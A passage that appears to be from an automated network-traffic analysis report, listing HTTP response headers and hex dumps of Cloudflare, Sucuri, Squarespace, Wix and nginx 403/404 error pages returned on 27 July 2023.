resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:44:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 6fc8e320-a54f-44b2-b023-77262466fc20CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9uVvp%2BOZHQHR0O8nB2%2BjJiUAJ5EnkJGkBXtaQ%2BOMxKboEUdDd0xQr3%2FrbJDbX9zPjBBBU37ILfKB4uuCDCUBzkB1kADHiRE9hdK8WZfmnbJBKFb7LuUPRo2uOGFX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=145.999908Server: cloudflareCF-RAY: 7ed760d768404d56-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Thu, 27 Jul 2023 19:44:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:44:55 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wPMnMzSCekv4Wh%2BGGkIHdw2nk9MWsn7i3GB03Q0fWfqpj6yYnSRnS3yq3R23lo4VaYcgV0YY5zDYC%2BZIVjJxFvSIK%2BV224KLyUBp%2BkCw9YU8LaVL4RNXjMsqUtTS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed760db5c4b039a-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equi
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 27 Jul 2023 19:44:40 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:44:40 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BRZ+qCplncMoY2NiMWM0ZWM4YTllN2ZhOTBkNWMxMTQ1ZjAyYTZj;Path=/X-Contextid: HDa5ye2I/YT4hvSW1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:44:39 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BQh2k9xSg186MjQ3YjhlZmU0N2Y1NmNjMGM1OTY3MmE3NWYxY2Vh;Path=/X-Contextid: yzeKu7Dh/NORzMIUVData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487081.13099942627416994X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:44:41 GMTX-Served-By: cache-mxp6923-MXPX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4KFbPzA2w5BhcpKxGOtqn2u,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:44:56 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t9xO8U9KyA8R%2FzFhO8SNDaeUExRMjJyM909DZJoobdvjIOyror44mhcym2W9jGfx0Uypmhd0c0yqDuellknXHUBL%2BSutkWeYI2gNZrWBCGvdwBPj5E1h9EUmFsNvI1zm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed760e118759be8-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! |
